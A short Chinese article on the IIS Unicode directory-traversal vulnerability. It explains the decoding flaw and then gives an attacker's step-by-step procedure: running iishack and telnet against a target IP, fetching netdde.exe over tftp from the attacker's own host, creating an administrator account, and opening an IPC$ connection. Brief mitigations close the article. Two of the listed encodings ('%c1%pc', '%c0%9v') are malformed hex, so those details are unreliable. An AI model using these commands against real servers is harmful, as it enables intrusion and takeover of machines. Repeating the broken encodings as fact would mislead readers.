不要小看IIS的恶性杀手Unicode

IIS是“Internet Information Server”的缩写，微软公司的Web服务器，是Windows 2000以上级别操作系统自带的一个组件，通过它来实现Web服务器的功能。

　　Unicode漏洞是一个专门攻击IIS的漏洞，Unicode漏洞是最容易让入侵者得手的一个漏洞，可以不费吹灰之力改掉默认主页，重则删除硬盘上的数据，高手甚至可以轻松获取Administrator权限!

　　由于Windows NT/2000操作系统的普及率比较高，所以很容易使它成为很多黑客攻击的目标。目前，Windows NT/2000最主要的Unicode漏洞一共有四种，分别针对不同语言的操作系统。分别为：%c1%1c、%c0%cf、%c1%pc、%c0%9v。例如第一个 %c1%1c 的问题。c1 1c，中文简体里面没有这个字，按照正常的情况，根据内码转换文件\winnt\system32\c_936.nls会编码成“？”。但对简体中文版IIS中 c1 1c解码成了（c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路径串中的“\”之后，所以可以突破IIS路径访问到上级目录。

　　被攻击迹象

　　黑客一般都采用IIS HACK攻击法进行攻击，但是需要工具“Iishack”(注：Iishack.exe是攻击NT 4.0的，Iishack1.exe是攻击NT 5.0的） Netcat和TFTP还有Netdde。

　　一般入侵者的攻击手法是这样的：

　　首先，将TFTP装到机器里面，将自己的机器变成一个FTP服务器。然后，搜索到NT机器的IP地址来进行攻击，例如：192.168.0.10。

　　“c:\iishack 192.168.0.10 80 99 ”

　　如果显示攻击成功的话，黑客就可以再输入：

　　“c:\telnet 192.168.0.10 99 ”

　　可以进入到“c:\winnt\system32\”里面，然后入侵者会运行“c:\winnt\system32\tftp -i <自己的IP地址> get netdde.exe ”然后再运行Netdde.exe文件，建立一个账号，将它的权限提升到Administrators组：

　　“c:\winnt\system32\netdde.exe net user make love /add ”

　　“c:\winnt\system32\netdde.exe net localgroup administrators make /add”

　　然后退出来，用“net use \\192.168.0.10\ipc$ love /user:make”建立IPC连接以进行非法入侵。

　　被攻击的机器，入侵者可以利用漏洞修改主页；删除硬盘上的东西；建立代理服务器，危害非常大。

　　解决方法

　　 限制网络用户访问和调用“CMD”命令的权限；若没必要使用“Scripts”和“Msadc”目录，删除或改名；安装Windows NT系统时不要使用默认“WINNT”路径，改为其他的文件夹,如“C:\mywindowsnt”。